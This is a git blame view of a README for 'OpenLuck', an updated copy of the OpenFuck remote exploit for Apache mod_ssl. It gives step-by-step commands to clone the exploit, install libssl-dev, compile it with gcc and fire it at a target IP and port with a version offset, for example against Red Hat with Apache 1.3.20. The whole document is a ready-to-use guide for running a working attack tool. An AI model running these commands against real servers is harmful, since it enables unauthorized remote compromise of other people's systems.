Files
OpenLucky/README.md

40 lines
827 B
Markdown
Raw Normal View History

2018-08-12 15:22:51 +03:00
# OpenLuck
2018-08-12 15:24:48 +03:00
Original is OpenFu*&%$#, I change for something more elegant
2018-06-24 22:12:48 +03:00
2018-06-24 22:12:16 +03:00
## Usage
2018-06-24 22:12:48 +03:00
This Exploit (https://www.exploit-db.com/exploits/764/) is outdated. Here you can take updated
2018-06-24 22:12:16 +03:00
1. Download OpenFuck.c
2018-06-24 22:12:48 +03:00
```
2018-06-24 22:12:16 +03:00
git clone https://github.com/heltonWernik/OpenFuck.git
2018-06-24 22:12:48 +03:00
```
2018-06-24 22:12:16 +03:00
2. Install ssl-dev library
2018-06-24 22:12:48 +03:00
```
2018-06-24 22:12:16 +03:00
apt-get install libssl-dev
2018-06-24 22:12:48 +03:00
```
2018-06-24 22:12:16 +03:00
3. It's Compile Time
2018-06-24 22:12:48 +03:00
````
2018-06-24 22:12:16 +03:00
gcc -o OpenFuck OpenFuck.c -lcrypto
2018-06-24 22:12:48 +03:00
````
2018-06-24 22:12:16 +03:00
4. Running the Exploit
2018-06-24 22:12:48 +03:00
```
2018-06-24 22:12:16 +03:00
./OpenFuck
2018-06-24 22:12:48 +03:00
```
5. See which service you witch to exploit. For example if you need to Red Hat Linux, using apache version 1.3.20. Trying out using the 0x6a option
2018-06-24 22:12:16 +03:00
./OpenFuck 0x6a [Target Ip] [port] -c 40
2018-06-24 22:12:48 +03:00
2018-06-24 22:12:16 +03:00
for example:
2018-06-24 22:12:48 +03:00
```
2018-06-24 22:12:16 +03:00
./OpenFuck 0x6a 192.168.80.145 443 -c 40
2018-06-24 22:12:48 +03:00
```
2018-06-24 22:12:16 +03:00
2018-06-24 22:12:48 +03:00
**References:**
2018-06-24 22:12:16 +03:00
https://kongwenbin.wordpress.com/tag/openfuck/
2018-08-12 15:22:51 +03:00
https://medium.com/@javarmutt/how-to-compile-openfuckv2-c-69e457b4a1d1